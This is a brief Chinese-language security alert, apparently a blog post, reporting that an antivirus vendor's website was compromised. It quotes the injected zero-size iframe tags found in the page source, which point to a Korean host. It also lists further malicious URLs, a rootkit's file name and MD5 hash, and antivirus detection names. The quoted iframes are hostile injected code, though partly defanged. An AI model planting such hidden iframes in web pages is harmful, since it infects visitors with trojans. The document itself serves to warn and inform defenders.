国内知名反病毒人士刘杰领导开发的反病毒软件日月光华杀毒软件的网站(
www.viruschina.com)被人为的植入木马程序。提前访问该网站的网友朋友请小心
检查了网页的源代码的在代码中部和底部发现以下代码:
iFrame sRc=p://.inforshop.co.kr/news/index.ht width=0 height=0
iFrame sRc=p://.inforshop.co.kr/news/index.ht width=0 height=0
iFrame sRc=p://.inforshop.co.kr/inforshop/ray.ht width=0 height=0
以上代码会利用IE和windows的漏洞下载并执行木马程序。
并且以上地址的木马程序在不断更改,今天下午发现的木马和目前发现的已经是不同的
在这个网页中,含有两个恶意网址,它们是h**p://www.inforshop.co.kr/news/ray.exe和h**p://www.362311.com/images/love.htm。
ray.exe,大小41,142字节,MD5值为f7e11614cf64069ef0ae622d13ad22e3,是个rookit。love.htm网页代开后,显示“对不起,您访问的页面不存在!”,该网页中含有h**p://www.362311.com/images/joke.htm恶意网页,joke.htm中含有h**p://www.362311.com/images/young.gif和h**p://www.362311.com/images/young.css。young.gif,大小6101字节,AVP报Trojan-Downloader.VBS.Phel.l;young.css,大小35,165字节,AVP报Trojan-PSW.Win32.Lmir.agw。
敬请网友暂时不要访问日月光华主页。
Trackback: http://tb.donews.net/TrackBack.aspx?PostId=491808